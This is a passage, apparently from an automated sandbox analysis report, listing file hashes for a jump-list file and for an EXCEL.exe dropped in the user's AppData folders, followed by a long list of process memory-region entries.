                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                                                    MD5

                                                                    ffacd7bea69ba1fea8a468271556cd7f

                                                                    SHA1

                                                                    dd4717e6239666d911e15858de49ae8d211fcb0d

                                                                    SHA256

                                                                    46231b24e61b5796855e03c0b98a3945ff680df05a3870ab1f6850c2715c3aed

                                                                    SHA512

                                                                    6e839d438874f0885d8df12b985ff9b6f8c802a330d9ad9a1d3184531f376cf0c5e936abf608b7ee146f00712d60b6fa0b2306ac1d10fe506a324ec833739d4a

                                                                  • \Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • \Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • \Users\Admin\AppData\Local\Temp\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • \Users\Admin\AppData\Roaming\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • \Users\Admin\AppData\Roaming\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • \Users\Admin\AppData\Roaming\EXCEL.exe
                                                                    MD5

                                                                    eefa3dd3a36a5decba3c42072ef0798e

                                                                    SHA1

                                                                    a51f4f499fc618b9dc36e079258ed3c087e2bae5

                                                                    SHA256

                                                                    862bf290697cfbd5cb41966b550e8b163aac94d6e07461c6e4353ea6fad62e83

                                                                    SHA512

                                                                    6e28230749c2938279e32d4c2631ea6193f28c2a5d5cd38f4176dc8e5e70a986db866e770ff32e4eaad3233b8e336f66877e1e2c70c9ef5ec2f3912f9df7d6a2

                                                                  • memory/108-349-0x0000000000413750-mapping.dmp
                                                                  • memory/240-160-0x0000000004B80000-0x0000000004B81000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/240-162-0x0000000004B82000-0x0000000004B83000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/240-143-0x0000000000000000-mapping.dmp
                                                                  • memory/388-128-0x0000000000000000-mapping.dmp
                                                                  • memory/388-142-0x00000000043B0000-0x00000000043B1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/664-68-0x0000000001090000-0x0000000001091000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/664-67-0x0000000004770000-0x0000000004771000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/664-66-0x0000000000FB0000-0x0000000000FB1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/664-69-0x0000000001092000-0x0000000001093000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/664-70-0x0000000005140000-0x0000000005141000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/664-71-0x0000000005240000-0x0000000005241000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/664-64-0x0000000000000000-mapping.dmp
                                                                  • memory/824-192-0x0000000004980000-0x0000000004981000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/824-195-0x0000000004982000-0x0000000004983000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/824-172-0x0000000000000000-mapping.dmp
                                                                  • memory/1016-153-0x0000000004910000-0x0000000004911000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1016-159-0x00000000048D0000-0x00000000048D1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1016-166-0x0000000005300000-0x0000000005301000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1016-169-0x00000000056A0000-0x00000000056A1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1016-145-0x0000000000000000-mapping.dmp
                                                                  • memory/1016-161-0x00000000048D2000-0x00000000048D3000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1016-150-0x0000000000F40000-0x0000000000F41000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1016-156-0x0000000002550000-0x0000000002551000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1068-130-0x0000000000000000-mapping.dmp
                                                                  • memory/1068-134-0x0000000000BF0000-0x0000000000BF1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1068-141-0x00000000002F0000-0x00000000002F1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1496-92-0x00000000056D0000-0x00000000056D1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1496-111-0x0000000006370000-0x0000000006371000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1496-105-0x0000000006350000-0x0000000006351000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1496-98-0x00000000057D0000-0x00000000057D1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1496-87-0x0000000000EF2000-0x0000000000EF3000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1496-97-0x0000000005790000-0x0000000005791000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1496-86-0x0000000000EF0000-0x0000000000EF1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1496-72-0x0000000000000000-mapping.dmp
                                                                  • memory/1496-118-0x000000007EF30000-0x000000007EF31000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1572-188-0x0000000004872000-0x0000000004873000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1572-171-0x0000000000000000-mapping.dmp
                                                                  • memory/1572-187-0x0000000004870000-0x0000000004871000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1600-140-0x00000000004B0000-0x00000000004B1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1600-129-0x0000000000000000-mapping.dmp
                                                                  • memory/1616-345-0x0000000000442F04-mapping.dmp
                                                                  • memory/1720-88-0x0000000004870000-0x0000000004871000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1720-74-0x0000000000000000-mapping.dmp
                                                                  • memory/1720-89-0x0000000004872000-0x0000000004873000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/1732-342-0x0000000000411654-mapping.dmp
                                                                  • memory/1840-61-0x0000000070A21000-0x0000000070A23000-memory.dmp
                                                                    Filesize

                                                                    8KB

                                                                  • memory/1840-63-0x00000000762C1000-0x00000000762C3000-memory.dmp
                                                                    Filesize

                                                                    8KB

                                                                  • memory/1840-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
                                                                    Filesize

                                                                    64KB

                                                                  • memory/1840-60-0x0000000072FA1000-0x0000000072FA4000-memory.dmp
                                                                    Filesize

                                                                    12KB

                                                                  • memory/1848-309-0x0000000000401364-mapping.dmp
                                                                  • memory/1912-324-0x0000000000401364-mapping.dmp
                                                                  • memory/2044-144-0x0000000000000000-mapping.dmp
                                                                  • memory/2044-163-0x0000000002550000-0x000000000319A000-memory.dmp
                                                                    Filesize

                                                                    12.3MB

                                                                  • memory/2044-165-0x0000000002550000-0x000000000319A000-memory.dmp
                                                                    Filesize

                                                                    12.3MB

                                                                  • memory/2072-190-0x0000000004AB0000-0x0000000004AB1000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/2072-173-0x0000000000000000-mapping.dmp
                                                                  • memory/2072-196-0x0000000004AB2000-0x0000000004AB3000-memory.dmp
                                                                    Filesize

                                                                    4KB

                                                                  • memory/2096-315-0x0000000000401364-mapping.dmp
                                                                  • memory/2140-246-0x0000000000000000-mapping.dmp
                                                                  • memory/2236-248-0x0000000000000000-mapping.dmp
                                                                  • memory/2252-249-0x0000000000000000-mapping.dmp
                                                                  • memory/2340-197-0x0000000000000000-mapping.dmp
                                                                  • memory/2356-198-0x0000000000000000-mapping.dmp
                                                                  • memory/2368-199-0x0000000000000000-mapping.dmp
                                                                  • memory/2468-255-0x0000000000000000-mapping.dmp
                                                                  • memory/2500-340-0x0000000000411654-mapping.dmp
                                                                  • memory/2548-337-0x0000000000423BC0-mapping.dmp
                                                                  • memory/2568-352-0x000000000040C2A8-mapping.dmp
                                                                  • memory/2620-212-0x0000000000000000-mapping.dmp
                                                                  • memory/2632-213-0x0000000000000000-mapping.dmp
                                                                  • memory/2644-214-0x0000000000000000-mapping.dmp
                                                                  • memory/2880-328-0x0000000000000000-mapping.dmp
                                                                  • memory/2892-231-0x0000000000000000-mapping.dmp
                                                                  • memory/2916-232-0x0000000000000000-mapping.dmp
                                                                  • memory/2932-233-0x0000000000000000-mapping.dmp
                                                                  • memory/3016-297-0x00000000004010B8-mapping.dmp